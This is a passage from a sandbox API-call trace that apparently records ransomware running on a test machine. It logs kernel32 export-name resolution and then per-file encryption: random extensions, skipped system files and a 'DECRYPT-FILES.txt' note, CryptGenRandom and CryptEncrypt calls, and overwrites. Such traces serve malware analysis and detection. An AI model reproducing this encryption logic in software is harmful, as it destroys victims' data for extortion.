lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.583] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.583] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.583] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.583] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.583] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.583] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.583] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.583] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.583] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.583] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.583] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.583] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.583] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.583] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.583] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.583] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.583] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.583] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.584] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.584] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.584] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.584] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.584] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.584] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.584] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.584] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.584] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.584] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.584] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.584] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.584] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.584] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.584] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.584] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.584] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.584] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.584] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.585] lstrlenA (lpString="DELETEATOM") returned 10 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.585] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.585] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.585] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.585] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.585] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.585] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.585] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.585] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.585] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.585] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.585] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.585] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.585] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.585] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.585] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.585] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.585] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.586] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.586] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.586] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.586] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.586] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.586] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.586] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.586] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.586] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.586] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.586] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.586] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.586] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.586] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.586] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.586] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.586] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.586] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.587] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.587] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.587] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.587] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.587] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.587] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.587] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UoljSEj8Z06B.flv") returned 70 [0087.587] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UoljSEj8Z06B.flv.OoWZ0") returned 76 [0087.587] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UoljSEj8Z06B.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\uoljsej8z06b.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UoljSEj8Z06B.flv.OoWZ0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\uoljsej8z06b.flv.oowz0"), dwFlags=0x0) returned 1 [0087.588] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.588] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.588] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.588] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79930ff0, ftCreationTime.dwHighDateTime=0x1d4ca5c, ftLastAccessTime.dwLowDateTime=0xd297da80, ftLastAccessTime.dwHighDateTime=0x1d4ca62, ftLastWriteTime.dwLowDateTime=0xd297da80, ftLastWriteTime.dwHighDateTime=0x1d4ca62, nFileSizeHigh=0x0, nFileSizeLow=0xfd82, dwReserved0=0x0, dwReserved1=0x0, cFileName="UTIc28qGYhgAyb46g.avi", cAlternateFileName="UTIC28~1.AVI")) returned 1 [0087.588] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi", lpString2="DECRYPT-FILES.txt") returned 1 [0087.588] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi", lpString2="autorun.inf") returned 1 [0087.588] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi", lpString2="boot.ini") returned 1 [0087.588] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi", lpString2="desktop.ini") returned 1 [0087.588] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi", lpString2="ntuser.dat") returned 1 [0087.589] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi", lpString2="iconcache.db") returned 1 [0087.589] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi", lpString2="bootsect.bak") returned 1 [0087.589] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi", lpString2="ntuser.dat.log") returned 1 [0087.589] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi", lpString2="thumbs.db") returned 1 [0087.589] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi", lpString2="Bootfont.bin") returned 1 [0087.589] lstrlenW (lpString="UTIc28qGYhgAyb46g.avi") returned 21 [0087.589] lstrcmpiW (lpString1="avi", lpString2="lnk") returned -1 [0087.589] lstrcmpiW (lpString1="avi", lpString2="exe") returned -1 [0087.589] lstrcmpiW (lpString1="avi", lpString2="sys") returned -1 [0087.589] lstrcmpiW (lpString1="avi", lpString2="dll") returned -1 [0087.589] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.589] lstrlenW (lpString="UTIc28qGYhgAyb46g.avi") returned 21 [0087.589] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.589] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="UTIc28qGYhgAyb46g.avi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UTIc28qGYhgAyb46g.avi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UTIc28qGYhgAyb46g.avi" [0087.589] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.589] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UTIc28qGYhgAyb46g.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\utic28qgyhgayb46g.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.589] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=64898) returned 1 [0087.589] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.589] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.590] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.590] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.590] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.590] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.590] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.591] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.592] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.593] CloseHandle (hObject=0x42c) returned 1 [0087.593] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.593] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.593] CloseHandle (hObject=0x0) returned 0 [0087.593] CloseHandle (hObject=0x428) returned 1 [0087.594] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.594] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.594] GetTickCount () returned 0x114e57f [0087.594] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.594] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.594] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.595] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.595] lstrlenA (lpString="kernel32.dll") returned 12 [0087.595] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.595] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.595] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.595] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.595] lstrlenA (lpString="ADDATOMA") returned 8 [0087.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.595] lstrlenA (lpString="ADDATOMW") returned 8 [0087.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.595] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.595] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.595] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.595] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") 